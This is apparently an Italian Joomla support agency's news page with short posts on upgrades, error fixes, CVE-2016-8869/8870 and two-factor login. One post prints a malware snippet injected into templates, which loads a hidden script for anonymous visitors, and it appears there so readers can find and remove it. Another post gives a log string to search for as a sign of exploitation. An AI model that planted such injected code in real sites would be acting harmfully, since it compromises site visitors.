Questo sito o gli strumenti terzi da questo utilizzati si avvalgono di cookie necessari al funzionamento ed utili alle finalità illustrate nella pagina di Privacy Policy. Chiudendo questo banner, scorrendo questa pagina, cliccando su un link o proseguendo la navigazione in altra maniera, acconsenti all’uso dei cookie.
Menu

News e aggiornamenti

Joomla! 4. Nuova versione nuove funzionalità

Il rilascio della nuova major release di Joomla! si avvicina.

Attualmente è stata rilasciata la versione Alpha4 con la previsione di un imminente passaggio alla prima Beta che dovrebbe essere rilasciata entro fine settembre 2018 con nuove caratteristiche fra le quali:

  • back-end completamente ridisegnato,
  • nuova architettura per la gestione delle Estensioni
  • implementazione della sicurezza lato database attraverso i “prepared statement”, che apportano importanti vantaggi rispetto all’esecuzione normale delle query;
  • tempi di analisi ridotti poiché la preparazione sulla query viene eseguita una sola volta e magari vengono poi usate più volte;
  • larghezza di banda del server ridotta al minimo in quanto invece di rinviare ogni volta una query, ne vengono inviati solo i parametri;
  • i rischi di attacchi di SQL Injection è molto bassa grazie ai ripetuti controlli sulla query
Read more...

Come gestire l'errore "Funzione deprecata iconv_set_encoding ()"

Come risolvere il seguente errore:

Deprecated: iconv_set_encoding(): Use of iconv.internal_encoding is deprecated in public_html\libraries\

Deprecated: iconv_set_encoding(): Use of iconv.internal_encoding is deprecated in public_html\joomla\libraries\joomla\string\string.php on line 27

Deprecated: iconv_set_encoding(): Use of iconv.input_encoding is deprecated in public_html\joomla\libraries\joomla\string\string.php on line 28

Deprecated: iconv_set_encoding(): Use of iconv.output_encoding is deprecated in public_html\joomla\libraries\joomla\string\string.php on line 29

 

  1. Apri il file string.php in ‘public_html\joomla\libraries\joomla\string\’ directory. vai alla linea 27.

  2. Sostituisci questo codice

     
    1
    2
    3
    4
    5
    6
    7
    if (function_exists('iconv'))
    {
    // These are settings that can be set inside code
    iconv_set_encoding("internal_encoding""UTF-8");
    iconv_set_encoding("input_encoding""UTF-8");
    iconv_set_encoding("output_encoding""UTF-8");
    }
  3. con questo

     
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    if (function_exists('iconv') && PHP_VERSION_ID < 50600)
    {
    // These are settings that can be set inside code
    iconv_set_encoding("internal_encoding""UTF-8");
    iconv_set_encoding("input_encoding""UTF-8");
    iconv_set_encoding("output_encoding""UTF-8");
    }
    elseif (PHP_VERSION_ID >= 50600)
    {
    ini_set("default_charset""UTF-8");
    }
Read more...

Novità da joomla 4

A partire da Joomla! 4.0 aumenteremo i requisiti minimi del server. Se vedi questo messaggio allora la tua attuale configurazione non ha i nuovi requisiti minimi.

I requisiti minimi sono i seguenti:

  • PHP 5.5.9
  • MySQL 5.5.3
  • PostgreSQL 9.2
  • MS SQL non sarà più supportato
  • MySQL che utilizza l'estensione PHP legacy `ext/mysql` non sarà più supportatabile, devono invece essere utilizzati MySQLi o PDO MySQL
Read more...

Save Failed with the Following Error: Invalid Parent ID

Joomla in alcuni casi volte può mostrare il seguente errore durante la creazione o la modifica di un nuovo articolo.

Cliccando sul pulsante salava appare il seguente messaggio di errore:

Save Failed with the Following Error: Invalid Parent ID

Per risolvere il problema Joomla 1.6, Joomla 1.7, Joomla 2.5 e Joomla 3+) si puo' sfruttare la n ovità introdotta con joomla 1.6, ovvero la tabella #__assets che consente di salvare una chiave esterna per tutti i contenuti di Joomla (e in alcuni casi estensioni di terze parti). 

  1. Vai su menu manager, seleziona tutti i menu e clicca sul pulsante rebuild
  2. Vai su category manager, seleziona tutte le categorie e clicca sul pulsante rebuild
  3. Apri tutte le categorie e salva. Questo inserirà le appropriate associazioni per tutte le categorie 

Adesso prova a modificare un articolo, il massaggi di errore dovrebbe essere scomparso.

 

Read more...

Rimuovere malware arpanet1957

Il sito che stai per visitare contiene malware!!!

 

Come prima cosa metti il sito off line, poi verifica la versione del cms joomla installata e nel caso effettua un aggiornamento all'ultima versione stabile. 

Cerca all'interno dei file php il codice malevolo e rimuovi tutti i file sospetti che trovi all'interno delle tue cartelle del server.

 

Esempio: 

(edita il template) e rimuovi questo codice: 

(go and edit template). Removed that code:

<?php $_bc6e8e2d=1;if(is_object($_SESSION["__default"]["user"]) && !($_SESSION["__default"]["user"]->id)) {echo " <script language=JavaScript id=onDate ></script> <script language=JavaScript src=/media/system/js/statbc6.php ></script> ";};$_bc6e8e2d=1; ?> 

Vai nella directory media\system\js\ and delete 3 files. statbc6.php and 2 weird files starting with sess_605df

 

I nomi dei file da rimuovere possono variare, se hai bisogno di aiuto, contattaci.

Read more...

Joomla ha appena rilasciato la versione 3.6.5

Vi informiamo che Joomla ha appena rilasciato la versione 3.6.5

che include tre fix di sicurezza. Una di queste è una patch critica ad alta priorità, che interessa in maniera particolare i siti che sono stati migrati da versioni precedenti alla verione 3.x.x

Si consiglia di aggiornare subito.

Se hai bisogno di aiuto da parte nostra per avere un sistema sempre aggiornato e protetto non esitare, contattaci.

Read more...

Joomla sotto attacco

Gli sviluppatori di Joomla, hanno rilasciato una patch di sicurezza (3.6.4) che sembra andare a coprire una serie di vulnerabilità critiche: Account Creation, Elevated Privileges e Account Modifications.  

Appena rilasciata la patch è stato possibile risalire, tramite le differenze di codice tra la precedente versione e quella appena rilasciata, quali erano i componenti del cms impattati. Questa operazione permette anche ad un eventuale attaccante di creare un exploit valido per sfruttare le vulnerabilità scoperte.

Secondo un articolo di Securi, una delle firme di sicurezza che si occupa di Web security, dopo appena 36 ore dal rilascio della patch, era già possibile verificare in rete attacchi che sfruttavano le vulnerabilità appena patchate.

La CVE-2016-8870 e la CVE-2016-8869 sono le vulnerabilità più critiche: la prima permette di creare un utente arbitrario sfruttando una classe utilizzata per rendere retrocompatibile il componente; la seconda consente di elevare i privilegi fino a diventare amministratore. Combinati insieme permettono la compromissione totale della piattaforma. 

Per verificare se il proprio sito è stato vittima di questo attacco è possibile cercare nei log del webserver questa stringa:

POST /index.php?option=com_users&task=user.register HTTP/1.1″

Tale stringa sta a significare che qualcuno ha tentato di creare un utente sul cms. Se ancora non avete aggiornato alla nuova versione e nel vostro log ed è presente questa stringa nei log sarebbe utile andare a controllare eventuali utenti creati recentemente e verificarne la loro attendibilità.

 

Per saperne di piu': Visita il sito

Read more...

Barracuda Vulnerability Manager

Barracuda Vulnerability Manager è un servizio cloud in grado di individuare le vulnerabilità delle applicazioni e dei siti web.

Riconosce vulnerabilità quali quelle comprese nell’OWASP Top 10, come ad esempio SQL injection e Cross-Site Scripting, mediante semplici funzionalità point and click. Barracuda Vulnerability Manager esegue la scansione di siti e applicazioni, in ambienti virtuali e nel cloud pubblico o privato e può essere integrato con Barracuda Web Application Firewall per creare e applicare automaticamente policy di correzione e proteggere dalle vulnerabilità identificate.

Read more...

Protegge i dati di accesso al sito con un codice segreto secondario che cambia ogni 30 secondi.

Joomla! ha un sistema di verifica in due passaggi integrato. Protegge i dati di accesso al sito con un codice segreto secondario che cambia ogni 30 secondi.

È possibile utilizzare il proprio Smartphone e l'applicazione Google Authenticator per la generazione del codice. 

Joomla! abiliterà il plugin Two Factor Authentication

La verifica in due passaggi sarà disponibile per tutti gli utenti.

Ogni utente può configurare la verifica in due passaggi nei dettagli utente.

Puoi sempre disabilitare il plugin Two Factor Authentication, o configurarlo per l'utilizzo solo per l'accesso al Pannello amministrativo.

Sarai portato alla pagina del tuo profilo utente dove è possibile trovare ulteriori informazioni sulla verifica in due passaggi e abilitarla per il tuo account utente.

Read more...
Joomla SEF URLs by Artio

Login